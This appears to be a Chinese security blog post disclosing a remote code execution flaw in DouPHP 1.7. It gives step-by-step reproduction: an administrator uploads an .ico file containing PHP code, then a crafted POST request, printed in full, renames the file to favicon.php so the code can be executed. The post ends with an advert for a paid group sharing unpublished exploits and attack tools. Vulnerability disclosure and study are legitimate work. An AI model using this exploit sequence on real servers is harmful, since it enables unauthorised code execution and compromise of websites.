【0day】DouPHP 1.7 Release 20220822 远程代码执行漏洞
【0day】DouPHP 1.7 Release 20220822 远程代码执行漏洞
安全之眼SecEye 2024-08-19 17:11
点击上方「蓝字」,关注我们
因为公众号现在只对常读和星标的公众号才能展示大图推送,建议大家进行星标
。操作方法:点击右上角的【…】,然后点击【设为星标】即可。
01
免责声明
免责声明:
文章所涉及内容,仅供安全研究与教学之用,由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者及本公众号不为此承担任何责任。
02
文章正文
漏洞描述
DouPHP是一个开源的PHP开发框架,广泛应用于快速开发Web应用。其设计目标是简单、快速、灵活、安全。
DouPHP 1.7Release20220822版本中存在一个远程代码执行(RCE)漏洞。拥有管理员权限的攻击者可以通过该漏洞在服务器上执行任意命令。漏洞通过上传恶意文件、修改文件扩展名以及通过构造特定的数据包来执行PHP代码。
漏洞复现
1、 登录管理员后台。
2、 上传恶意文件
3、 上传一个包含php代码的ico图标
上传成功:
4、把上传的favicon.ico文件修改为favicon.php,从而执行php代码。
抓取数据包,进行修改文件名操作
POST /cache/custom\_admin\_path.candel.php HTTP/1.1
Host: douphp:84
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://douphp:84
Connection: close
Referer: http://douphp:84/admin/tool.php?rec=custom\_admin\_path
Cookie: PHPSESSID=bl1s095coldq9mc4a2d9ivrgki
Upgrade-Insecure-Requests: 1
Priority: u=0, i
new\_path=favicon.php&old\_path=favicon.ico&ryjwoi=278144&root\_url=http%3A%2F%2Fdouphp%3A84%2F&submit=%E6%8F%90%E4%BA%A4
访问对应的恶意文件路径:http://{你的url地址}/favicon.php
attachment/2024/08/d773107c-726b-4f24-a0b7-4aff6cf98e48-weAxeCnx.docx
星球介绍
高质量漏洞利用工具、漏洞POC/EXP、实战tips分享社区,日常更新0Day/Nday/1day及对应漏洞的批量利用工具,内部POC分享,星球不定时更新内外网攻防渗透技巧、src挖掘技巧等。
同时,内部的交流群有很多行业老师傅可以为你解答学习上的疑惑
,实战或者攻防中遇到的技术、非技术难题我们也可以通过自己的途径帮你一起解决。
【星球服务】
1,Fofa永久高级会员
2,常态化更新最新的漏洞POC/EXP,未公开、半公开漏洞POC
3,不定时更新SRC挖掘小技巧、SRC挖掘报告
4,安全圈兼职、全职工作内推途径;职业生涯发展路线答疑解惑
5,各种漏洞利用工具,渗透工具、学习资料文档分享
6,加入内部微信群,认识更多的行业朋友(各大安全厂商以及互联网、金融行业甲方安全师傅),遇到任何技术问题都可以进行快速提问、讨论交流;
点个「在看」,你最好看